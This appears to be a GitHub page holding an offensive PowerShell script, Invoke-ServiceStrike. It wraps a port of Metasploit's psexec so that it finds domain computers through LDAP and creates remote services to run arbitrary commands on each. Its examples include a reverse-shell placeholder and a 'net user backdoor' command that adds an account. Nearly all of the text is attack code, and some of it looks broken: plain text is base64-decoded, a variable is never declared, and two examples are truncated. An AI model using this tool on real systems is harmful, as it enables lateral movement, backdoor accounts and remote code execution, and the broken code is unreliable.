-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathInvoke-ServiceStrike.ps1
More file actions
168 lines (118 loc) · 20.3 KB
/
Invoke-ServiceStrike.ps1
File metadata and controls
168 lines (118 loc) · 20.3 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
<#
Invoke-ServiceStrike.ps1
Author: @polair
License: BSD 3-Clause
#>
########################################################
#
# This script includes and executes a modified version of Invoke-PsExec originally published under the BSD 3-Clause License.
# Author: Will Schroeder (@harmj0y)
# https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1
#
########################################################
function Invoke-ServiceStrike {
<#
.SYNOPSIS
Attempts to create and start a service by bypassing the OpenService call, in order to verify whether the current user has local admin privileges on domain or LAN machines, assuming only SC_MANAGER_ALL_ACCESS right is available on the SCManager.
.DESCRIPTION
Attempts to create and start a service by bypassing the OpenService call, in order to verify whether the current user has local admin privileges on domain or LAN machines, assuming only SC_MANAGER_ALL_ACCESS right is available on the SCManager.
.PARAMETER ComputerName
IP address or hostname of the remote system.
.PARAMETER timeout
Maximum time to wait for runspaces (max = timeout * number of machines).
.PARAMETER threads
Maximum number of runspaces to run in parallel.
.EXAMPLE
Import-Module .\Invoke-ServiceStrike.ps1
Invoke-ServiceStrike -Command <revShell> [-timeout 45000 -threads 5 -ComputerName '192.168.1.103' -ServiceName test]
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory = $false, ValueFromPipeLine = $true, ValueFromPipelineByPropertyName = $true)]
[String]
$ComputerName,
[Parameter(Mandatory = $True)]
[String]
$Command,
[String]
$ServiceName = "TestSVC",
[Parameter(Mandatory = $false)]
[string]
$timeout = 35000,
[Parameter(Mandatory = $false)]
[int]
$threads = 5
)
Begin {
$ErrorActionPreference2 = "$ErrorActionPreference"
$ErrorActionPreference = "silentlycontinue"
$invoke_psexec = @'
function Invoke-PsExec {
    <#
    .SYNOPSIS

        This function is a rough port of Metasploit's psexec functionality.
        It utilizes Windows API calls to open up the service manager on
        a remote machine, creates/run a service with an associated binary
        path or command, and then cleans everything up.

        Adapted from MSF's version (see links).

        Author: @harmj0y
        License: BSD 3-Clause

    .PARAMETER ComputerName

        ComputerName to run the command on.

    .PARAMETER Command

        Binary path (or Windows command) to execute.

    .PARAMETER ServiceName

        The name of the service to create, defaults to "TestSVC"


    .PARAMETER NoCleanup

        Don't remove the service after starting it

    .EXAMPLE

        PS C:\> Invoke-PsExec -ComputerName 192.168.50.200 -Command "net user backdoor password123 /add" -ServiceName Updater32

        Creates a user named backdoor on the 192.168.50.200 host, with the
        temporary service being named 'Updater32'.

    .EXAMPLE

        PS C:\> 

        Runs the "dir C:\" command on 192.168.50.200 with a temporary service named 'Updater32',
        and copies the result file to "results.txt" on the local path.

    .EXAMPLE

        PS C:\> .

        Uploads "service.exe" to the remote host, registers/starts it as a service with name
        'Updater32', and removes the service/binary after it runs (or fails to respond w/in 30 seconds).

    .LINK

        https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/psexec.rb
        https://github.com/rapid7/metasploit-framework/blob/master/tools/psexec.rb
#>
    [CmdletBinding()]
    param(
        [Parameter(Mandatory = $True)]
        [String]
        $ComputerName,

        [String]
        $Command,

        [String]
        $ServiceName = "TestSVC",

        [switch]
        $NoCleanup
    )

    $ErrorActionPreference = "Stop"

    #  http://stackingcode.com/blog/2011/10/27/quick-random-string
    function Local:Get-RandomString {
        param (
            [int]$Length = 12
        )
        $set = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ".ToCharArray()
        $result = ""
        for ($x = 0; $x -lt $Length; $x++) {
            $result += $set | Get-Random
        }
        $result
    }

    # from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
    function Local:Get-DelegateType {
        Param
        (
            [OutputType([Type])]

            [Parameter( Position = 0)]
            [Type[]]
            $Parameters = (New-Object Type[](0)),

            [Parameter( Position = 1 )]
            [Type]
            $ReturnType = [Void]
        )

        $Domain = [AppDomain]::CurrentDomain
        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
        $MethodBuilder.SetImplementationFlags('Runtime, Managed')

        Write-Output $TypeBuilder.CreateType()
    }

    # from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
    function Local:Get-ProcAddress {
        Param
        (
            [OutputType([IntPtr])]

            [Parameter( Position = 0, Mandatory = $True )]
            [String]
            $Module,

            [Parameter( Position = 1, Mandatory = $True )]
            [String]
            $Procedure
        )

        # Get a reference to System.dll in the GAC
        $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
        Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
        # Get a reference to the GetModuleHandle and GetProcAddress methods
        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
        # Get a handle to the module specified
        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
        $tmpPtr = New-Object IntPtr
        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)

        # Return the address of the function
        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
    }


    function Local:Invoke-PsExecCmd {
        param(
            [Parameter(Mandatory = $True)]
            [String]
            $ComputerName,

            [Parameter(Mandatory = $True)]
            [String]
            $Command,

            [String]
            $ServiceName = "TestSVC",

            [switch]
            $NoCleanup
        )

        # Declare/setup all the needed API function
        # adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
        $CloseServiceHandleAddr = Get-ProcAddress Advapi32.dll CloseServiceHandle
        $CloseServiceHandleDelegate = Get-DelegateType @( [IntPtr] ) ([Int])
        $CloseServiceHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseServiceHandleAddr, $CloseServiceHandleDelegate)

        $OpenSCManagerAAddr = Get-ProcAddress Advapi32.dll OpenSCManagerA
        $OpenSCManagerADelegate = Get-DelegateType @( [String], [String], [Int]) ([IntPtr])
        $OpenSCManagerA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenSCManagerAAddr, $OpenSCManagerADelegate)


        $CreateServiceAAddr = Get-ProcAddress Advapi32.dll CreateServiceA
        $CreateServiceADelegate = Get-DelegateType @( [IntPtr], [String], [String], [Int], [Int], [Int], [Int], [String], [String], [Int], [Int], [Int], [Int]) ([IntPtr])
        $CreateServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateServiceAAddr, $CreateServiceADelegate)

        $StartServiceAAddr = Get-ProcAddress Advapi32.dll StartServiceA
        $StartServiceADelegate = Get-DelegateType @( [IntPtr], [Int], [Int]) ([IntPtr])
        $StartServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StartServiceAAddr, $StartServiceADelegate)

        $DeleteServiceAddr = Get-ProcAddress Advapi32.dll DeleteService
        $DeleteServiceDelegate = Get-DelegateType @( [IntPtr] ) ([IntPtr])
        $DeleteService = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DeleteServiceAddr, $DeleteServiceDelegate)

        $GetLastErrorAddr = Get-ProcAddress Kernel32.dll GetLastError
        $GetLastErrorDelegate = Get-DelegateType @() ([Int])
        $GetLastError = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetLastErrorAddr, $GetLastErrorDelegate)

        # Step 1 - OpenSCManager()
        # 0xF003F = SC_MANAGER_ALL_ACCESS
        #   http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
        # "[*] Opening service manager"
        $ManagerHandle = $OpenSCManagerA.Invoke("\\$ComputerName", "ServicesActive", 0xF003F)
        # Write-Verbose "[*] Service manager handle: $ManagerHandle"

        # if we get a non-zero handle back, everything was successful
        if ($ManagerHandle -and ($ManagerHandle -ne 0)) {

            # Step 2 - CreateService()
            # 0xF003F = SC_MANAGER_ALL_ACCESS
            # 0x10 = SERVICE_WIN32_OWN_PROCESS
            # 0x3 = SERVICE_DEMAND_START
            # 0x1 = SERVICE_ERROR_NORMAL
            # "[*] Creating new service: '$ServiceName'"
            $ServiceHandle = $CreateServiceA.Invoke($ManagerHandle, $ServiceName, $ServiceName, 0xF003F, 0x10, 0x3, 0x1, $Command, $null, $null, $null, $null, $null)
            #Write-Verbose "[*] CreateServiceA Handle: $ServiceHandle"
              
            if ($ServiceHandle -and ($ServiceHandle -ne 0)) {

                # Step 5 - StartService()
                # "[*] Starting the service, ensure the command runs as expected."
                $val = $StartServiceA.Invoke($ServiceHandle, $null, $null)

                # if we successfully started the service, let it breathe and then delete it
                if ($val -ne 0) {
                    "`n[+] $ComputerName : Service successfully started "
                    # breathe for a second
                    Start-Sleep -s 1
                }
                else {
                    # error codes - http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
                    $err = $GetLastError.Invoke()
                    if ($err -eq 1053) {
                        "`n[+] $ComputerName : The service started but returned error 1053. It's always worth checking that the command was executed properly."
                    }
                    else {
                        #Write-Warning "[!] StartService failed, LastError: $err"
                        #"[!] StartService failed, LastError: $err"
                    }
                    # breathe for a second
                    Start-Sleep -s 1
                }

                if (-not $NoCleanup) {
                    # start cleanup
                    # Step 6 - DeleteService()
                    "[+] $ComputerName : Deleting the service '$ServiceName'"
                    $val = $DeleteService.invoke($ServiceHandle)

                    if ($val -eq 0) {
                        # error codes - http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
                        $err = $GetLastError.Invoke()
                        "[!] $ComputerName : DeleteService failed, LastError: $err`n"
                    }
                    else {
                        "[+] $ComputerName : Service successfully deleted`n"
                    }
                }

                # Step 7 - CloseServiceHandle() for the service handle
                # "[*] Closing the service handle"
                $val = $CloseServiceHandle.Invoke($ServiceHandle)
                # Write-Verbose "[*] Service handle closed off"

            }
            else {
                # error codes - http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
                $err = $GetLastError.Invoke()
                # Write-Warning "[!] CreateServiceA failed, LastError: $err"
                "`n[!] $ComputerName : CreateServiceA failed, LastError: $err. Try using a different service name.`n"
            }
            
            # final cleanup - close off the manager handle
            # "[*] Closing the manager handle"
            $t = $CloseServiceHandle.Invoke($ManagerHandle)
        }
        else {
            # error codes - http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
            $err = $GetLastError.Invoke()
            # Write-Warning "[!] OpenSCManager failed, LastError: $err"
            #"[!] OpenSCManager failed, LastError: $err"
        }
    }

    Invoke-PsExecCmd -ComputerName $ComputerName -Command $Command -ServiceName $ServiceName
        
}
'@
$bytes = [Convert]::FromBase64String($invoke_psexec)
$invoke_psexecDec = [System.Text.Encoding]::UTF8.GetString($bytes)
}
Process {
if ($Computerfile) {
$Computers = Get-Content $Computerfile
}
elseif ($ComputerName) {
$Computers = $ComputerName
}
else {
$localFQDN = [System.Net.Dns]::GetHostEntry($env:COMPUTERNAME).HostName
$DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher
$DirectorySearcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry
$DirectorySearcher.Filter = "(&(sAMAccountType=805306369))"
$Computers = $DirectorySearcher.FindAll() | ForEach-Object {
$hostname = $_.properties["dnshostname"]
if ($hostname -and $hostname -ne $localFQDN) {
$hostname
}
}
}
$runspacePool = [runspacefactory]::CreateRunspacePool(1, $threads)
$runspacePool.Open()
$runspaces = @()
foreach ($ComputerName in $Computers) {
"`n[*] Trying $ComputerName..."
$ps = [powershell]::Create()
$ps.RunspacePool = $runspacePool
$ps.AddScript({
param($ComputerName, $Command, $ServiceName, $invoke_psexecDec)
Invoke-Expression $invoke_psexecDec
Invoke-PsExec -ComputerName $ComputerName -Command $Command -ServiceName $ServiceName
}).AddArgument($ComputerName).AddArgument($Command).AddArgument($ServiceName).AddArgument($invoke_psexecDec) > $null
$runspaces += [PSCustomObject]@{
PowerShell = $ps
Handle = $ps.BeginInvoke()
}
}
foreach ($rs in $runspaces) {
#Write-Host " Time started on $($rs.PowerShell.InstanceId)"
$handle = $rs.Handle.AsyncWaitHandle
if ($handle.WaitOne($timeout)) {
#Write-Host "Time over on $($rs.PowerShell.InstanceId)"
$output = $rs.PowerShell.EndInvoke($rs.Handle)
foreach ($line in $output) {
if ($line -is [string]) {
Write-Host $line
}
}
}
else {
#Write-Host " Timeout on $($rs.PowerShell.InstanceId)"
continue
}
$rs.PowerShell.Dispose()
}
}
End {
try {
$ErrorActionPreference = $ErrorActionPreference2
#Write-Host "Completed"
}
catch {
}
}
}